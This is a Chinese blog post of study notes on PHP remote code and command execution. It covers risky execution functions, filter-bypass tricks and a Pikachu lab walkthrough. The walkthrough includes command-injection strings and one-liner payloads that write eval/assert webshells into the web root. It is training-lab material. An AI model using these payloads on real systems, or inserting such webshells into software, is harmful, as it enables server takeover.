RCE漏洞学习

已于 2024-08-11 23:46:15 修改
阅读量134 收藏 3
点赞数 2
文章标签: 安全 网络 web安全
于 2024-08-11 23:45:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60247269/article/details/141113673
版权

目录

一、概述

二、常见的漏洞函数

三、RCE绕过

四、Pikachu靶场练习

一、概述

        RCE漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令、代码,从而控制后台系统。

        产生RCE漏洞的根本原因在于,服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。或者在Web应用中开发者为了灵活性,简洁性等会让应用调用代码或者系统命令执行函数去处理,同时没有考虑用户的输入是否可以被控制,造成代码/系统命令执行漏洞。 

二、常见的漏洞函数

1.system():执行外部程序,并且显示输出

<?php
system("whoami");

2.exec():执行一个外部程序

<?php
$output=null;
$retval=null;
exec('whoami', $output, $retval);
echo "Returned with status $retval and output:\n";
print_r($output);

3.shell_exec():通过 shell 执行命令并将完整的输出以字符串的方式返回

<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";

4.passthru():执行外部程序并且显示原始输出

<?php
passthru("ipconfig");

三、RCE绕过

1.管道符

2.空格过滤

3.\绕过

c\at /flag
l\s /

4.正则匹配绕过

cat /f???
cat /fl*
cat /f[a-z]{2}

四、Pikachu靶场练习

1.exec "ping"

提供了一个PING接口,用于执行PING命令

“|”在windows中的意思是:把前面的结果当成后面的输入

直接获取webshell

?cmd=echo “<?php @eval($_REQUEST[q]); ?>” > C:\phpstudy\PHPTutorial\WWW\webshell.php

显示当前路径

?cmd=cd

使用127.0.0.1 & ipconfig攻击

写入文件

?cmd=echo "?php phpinfo(); ?>" > C:\Users\HP\Desktop\shell.php

2.exec "eval"

这里输入想要执行的php代码即可
输入phpinfo();后回显在页面上

创建一个shell.php的文件,在该文件中写入一句话木马:

fputs(fopen('shell.php','w'),'<?php assert($_POST[s]);?>');

可以观察靶场的源代码,得知这里没有对用户的输入进行校验,也就是说,直接将用户的输入当作PHP代码执行

dream Fly YH
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GitStack系统RCE漏洞学习
weixin_30484247的博客
09-11 426
漏洞简介 漏洞简情 漏洞程序 GitStack 影响版本 <=2.3.10 漏洞类型 RCE 漏洞评价 高危 漏洞编号 CVE-2018-5955 漏洞程序介绍 GitStack是一款基于Python(Django框架)和PHP的win平台下的git可视化平台。它存在很多问题,下面简单介绍一下所有的背景安全问题。这些背景安全问题将导致RCE漏洞的利用。 背景安全问题 默认弱口...
ThinkPHP 5.0.23 RCE漏洞学习笔记
Hezhoutheone的博客
09-23 1553
影响版本 ThinkPHP版本 5.0.0~5.0.23 漏洞实验环境 靶机:Ubuntu虚拟机 攻击机:Windows10 开启vulhub靶场-打开docker cd vulhub/thinkphp/2-rce docker-compose up -d 通过docker ps 查看开放端口为8080 通过输入 错误url地址信息得到ThinkPHP版本信息——V 5.0.23 利用网上payload测试,通过hackbar插件直接打post包...
spark未授权RCE漏洞学习
weixin_30746117的博客
02-19 1664
Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架,用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式,包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算,及时依赖磁盘进行复杂的运算,Spark依然比MapReduce更加高效。 Spark未...
RCE 漏洞 CTFhub学习
qq_51954912的博客
06-05 1036
文章目录前言什么是RCE漏洞eval执行命令注入(无过滤)过滤cat 前言 之前刷buu的题的时候,见过RCE漏洞的题,但是由于没有系统的学习,解题比较的困难。这次,系统的学习一下,再去解那道题。 什么是RCE漏洞 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 出现的原因是:没有在输入口做输入处理。 eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST[
Apache SCXML2 RCE漏洞
rev1ve的博客
11-16 1389
(注意用花生壳的https而不是tcp,因为tcp的无法访问web)我们直接在题目处远程RCE读取我们的xml文件,payload如下。注:其他师傅payload为http服务器,我用的是https。利用内网穿透https服务器映射我们虚拟机的8000端口。我们开启临时文件服务器,执行下面命令。反弹shell成功,得到flag。访问8000端口,成功访问。shell.xml源码。除此之外还有很多构造的。
CTFHUB--RCE漏洞初步学习
qq_75120258的博客
03-27 716
关于RCE,在学习过程中其实已经接触到了很多,但在学习的时候都是这儿那儿一点一点的拼接起来的,所以看了很多大佬的博客,总结了一下,打算写一篇博客,好好的整理一下自己学习RCE所学到的东西。
RCE漏洞简介
永远是少年
12-10 5702
今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE漏洞简介。 一、RCE漏洞简介与危害 二、代码执行和命令执行区别 三、RCE漏洞产生与防护
Pikachu靶场之RCE漏洞详解
m0_46467017的博客
05-18 6329
Pikachu靶场之RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
RCE学习(一)
Dug123456_的博客
05-01 870
RCE:远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。可选,用来存放搜索结果,$matches[0]存放所有匹配的字符串,$matches[1]用来存放第一个匹配的字符串,$matches[2]用来存放第三个匹配的字符串,以此类推。管道输出符|:前面命令的输出作为后面命令的输入,把前面命令的结果作为后面命令的参数;dir /ah /os //显示当目下隐藏的文件和目录,按文件大小从小到大排序。
rConfig v3.9.2 RCE漏洞分析1
08-03
总的来说,rConfig v3.9.2的这两个RCE漏洞揭示了在开发过程中对用户输入处理的重要性以及对安全编程实践的遵循。通过学习这些案例,我们可以更好地理解如何避免类似的安全问题,并提高我们系统的安全性。
如何利用三个漏洞组合达成Discord RCE漏洞 .pdf
09-05
《利用三个漏洞组合达成Discord RCE漏洞的深入解析》 Discord,一款深受游戏玩家、教育工作者和商业人士喜爱的实时通讯平台,以其强大的语音和文本聊天功能,以及丰富的社区特性,吸引了全球数百万用户。然而,如同...
CVE-2021-22192 靶场: 未授权用户 RCE 漏洞.zip
01-14
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
最新发布
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 840
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
水域救援设备,保护水域安全_鼎跃安全
ShenZhenDingYue的博客
08-06 293
当然,水域安全问题不仅需要水域救援人员和设备的保障,还需要我们每个人进行水域安全知识的学习和培训,严格遵守当地的水域安全管理条例,在进行水域活动时,尽量结伴而行,保持联系。这些水域安全设备能够为我们水域活动提供保障,也可以提供水域救援的效率,降低安全风险,保障生命安全。与此同时,随着水域经济的蓬勃发展,各类水上及水下娱乐活动日益丰富多样,从刺激的冲浪、潜水到悠闲的划船、垂钓,无一不吸引着四面八方的游客纷至沓来,享受水上乐趣。绳子具有浮力,方便在水面使用,用于远距离救援,将绳子抛给落水者。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1391
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 878
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 637
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值